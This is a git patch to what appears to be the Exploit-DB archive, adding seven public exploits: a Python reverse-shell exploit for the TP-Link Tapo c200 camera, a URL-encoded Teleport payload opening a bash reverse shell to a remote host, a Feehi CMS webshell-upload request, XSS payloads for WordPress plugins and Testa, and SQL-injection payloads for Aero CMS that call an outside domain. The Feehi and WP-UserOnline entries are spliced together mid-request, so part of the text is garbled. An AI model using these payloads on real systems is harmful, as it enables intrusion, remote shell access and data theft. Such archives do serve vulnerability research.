From c5397147d9e6ad8ebb47c3d99113be7b36e9c129 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 24 Sep 2022 05:01:44 +0000 Subject: [PATCH] DB: 2022-09-24 7 changes to exploits/shellcodes Teleport v10.1.1 - Remote Code Execution (RCE) TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) Aero CMS v0.0.1 - SQLi Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) --- exploits/hardware/webapps/51017.py | 32 +++++++++ exploits/multiple/remote/51019.txt | 19 ++++++ exploits/php/webapps/51018.txt | 106 +++++++++++++++++++++++++++++ exploits/php/webapps/51020.txt | 29 ++++++++ exploits/php/webapps/51021.txt | 24 +++++++ exploits/php/webapps/51022.txt | 47 +++++++++++++ exploits/php/webapps/51023.txt | 20 ++++++ files_exploits.csv | 7 ++ 8 files changed, 284 insertions(+) create mode 100755 exploits/hardware/webapps/51017.py create mode 100644 exploits/multiple/remote/51019.txt create mode 100644 exploits/php/webapps/51018.txt create mode 100644 exploits/php/webapps/51020.txt create mode 100644 exploits/php/webapps/51021.txt create mode 100644 exploits/php/webapps/51022.txt create mode 100644 exploits/php/webapps/51023.txt diff --git a/exploits/hardware/webapps/51017.py b/exploits/hardware/webapps/51017.py new file mode 100755 index 000000000..39669c68e --- /dev/null +++ b/exploits/hardware/webapps/51017.py @@ -0,0 +1,32 @@ +# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) +# Date: 02/11/2022 +# Exploit Author: hacefresko +# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ +# Version: 1.1.15 and below +# Tested on: 1.1.11, 1.1.14 and 1.1.15 +# CVE : CVE-2021-4045 + +# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce + +import requests, urllib3, sys, threading, os +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +PORT = 1337 +REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' +NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version) + +if len(sys.argv) < 3: + print("Usage: python3 pwnTapo.py ") + exit() + +victim = sys.argv[1] +attacker = sys.argv[2] + +print("[+] Listening on %d" % PORT) +t = threading.Thread(target=os.system, args=(NC_COMMAND,)) +t.start() + +print("[+] Serving payload to %s\n" % victim) +url = "https://" + victim + ":443/" +json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}} +requests.post(url, json=json, verify=False) \ No newline at end of file diff --git a/exploits/multiple/remote/51019.txt b/exploits/multiple/remote/51019.txt new file mode 100644 index 000000000..8b2c23469 --- /dev/null +++ b/exploits/multiple/remote/51019.txt @@ -0,0 +1,19 @@ +# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE) +# Date: 08/01/2022 +# Exploit Author: Brandon Roach & Brian Landrum +# Vendor Homepage: https://goteleport.com +# Software Link: https://github.com/gravitational/teleport +# Version: < 10.1.2 +# Tested on: Linux +# CVE: CVE-2022-36633 + +Proof of Concept (payload): +https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2= +f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3= +0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?= +method=3Diam + + +Decoded payload: +" +/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 # \ No newline at end of file diff --git a/exploits/php/webapps/51018.txt b/exploits/php/webapps/51018.txt new file mode 100644 index 000000000..fefdec63d --- /dev/null +++ b/exploits/php/webapps/51018.txt @@ -0,0 +1,106 @@ +# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) +# Date: 22-08-2022 +# Exploit Author: yuyudhn +# Vendor Homepage: https://feehi.com/ +# Software Link: https://github.com/liufee/cms +# Version: 2.1.1 (REQUIRED) +# Tested on: Linux, Docker +# CVE : CVE-2022-34140 + + + +# Proof of Concept: +1. Login using admin account at http://feehi-cms.local/admin +2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex +3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate +4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php. +5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php + +# Burp request example: + +POST /admin/index.php?r=ad%2Fcreate HTTP/1.1 +Host: feehi-cms.local +Content-Length: 1530 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://feehi-cms.local +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D + +Connection: close + + + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="_csrf_backend" + + + +FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg== + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[name]" + + + +rce + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[tips]" + + + +rce at Ad management + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[input_type]" + + + +1 + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[ad]" + + + + + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php" + +Content-Type: image/png + + + +alert(/XSS/) + d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload + will be executed. + +Note: This change will be permanent until you modify the edited fields. \ No newline at end of file diff --git a/exploits/php/webapps/51021.txt b/exploits/php/webapps/51021.txt new file mode 100644 index 000000000..381682643 --- /dev/null +++ b/exploits/php/webapps/51021.txt @@ -0,0 +1,24 @@ +# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) +# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/ +# Date: 2022-08-24 +# Exploit Author: UnD3sc0n0c1d0 +# Vendor Homepage: https://profiles.wordpress.org/3dady/ +# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip +# Category: Web Application +# Version: 1.0 +# Tested on: Debian / WordPress 6.0.1 +# CVE : N/A + +# 1. Technical Description: +The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text +and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of +JavaScript code that can exploit the vulnerability. + +# 2. Proof of Concept (PoC): + a. Install and activate version 1.0 of the plugin. + b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady). + c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text): + " autofocus onfocus=alert(/XSS/)> + d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed. + + Note: This change will be permanent until you modify the edited fields. \ No newline at end of file diff --git a/exploits/php/webapps/51022.txt b/exploits/php/webapps/51022.txt new file mode 100644 index 000000000..7c4821b59 --- /dev/null +++ b/exploits/php/webapps/51022.txt @@ -0,0 +1,47 @@ +# Title: Aero CMS v0.0.1 - SQLi +# Author: nu11secur1ty +# Date: 08.27.2022 +# Vendor: https://github.com/MegaTKC +# Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1 +# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi + +# Description: +The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to +be vulnerable to SQL injection attacks. +The malicious user can dump-steal the database, from this CMS system +and he can use it for very malicious purposes. + +STATUS: HIGH Vulnerability + +[+]Payload: +```mysql +--- +Parameter: author (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4 + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (FLOOR) + Payload: author=admin'+(select +load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' +OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT +(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: author=admin'+(select +load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' +AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4 + + Type: UNION query + Title: MySQL UNION query (NULL) - 10 columns + Payload: author=admin'+(select +load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' +UNION ALL SELECT +NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4 +--- + +``` \ No newline at end of file diff --git a/exploits/php/webapps/51023.txt b/exploits/php/webapps/51023.txt new file mode 100644 index 000000000..bb1010965 --- /dev/null +++ b/exploits/php/webapps/51023.txt @@ -0,0 +1,20 @@ +# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) +# Date: 28/08/2022 +# Exploit Author: Ashkan Moghaddas +# Vendor Homepage: https://testa.cc +# Software Link: +https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip +# Version: 3.5.1 +# Tested on: Windows/Linux + +# Proof of Concept: +# 1- Install Testa 3.5.1 +# 2- Go to https://localhost.com/login.php?redirect=XXXX +# 3- Add payload to the Tab, the XSS Payload: +%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E +# 4- XSS has been triggered. + +# Go to this url " +https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E +" +XSS will trigger. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c87248b7a..5bcd9fcac 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18727,6 +18727,7 @@ id,file,description,date,author,type,platform,port 51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux, 51015,exploits/ios/remote/51015.txt,"Wifi HD Wireless Disk Drive 11 - Local File Inclusion",1970-01-01,"Chokri Hammedi",remote,ios, 51016,exploits/windows/remote/51016.sh,"WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",remote,windows, +51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",1970-01-01,"Brandon Roach",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -45078,3 +45079,9 @@ id,file,description,date,author,type,platform,port 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple, 51012,exploits/hardware/webapps/51012.txt,"Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass",1970-01-01,"Jordan Glover",webapps,hardware, 51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",1970-01-01,"Akshay Ravi",webapps,multiple, +51017,exploits/hardware/webapps/51017.py,"TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)",1970-01-01,hacefresko,webapps,hardware, +51018,exploits/php/webapps/51018.txt,"Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,yuyudhn,webapps,php, +51020,exploits/php/webapps/51020.txt,"Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php, +51021,exploits/php/webapps/51021.txt,"Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php, +51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php, +51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,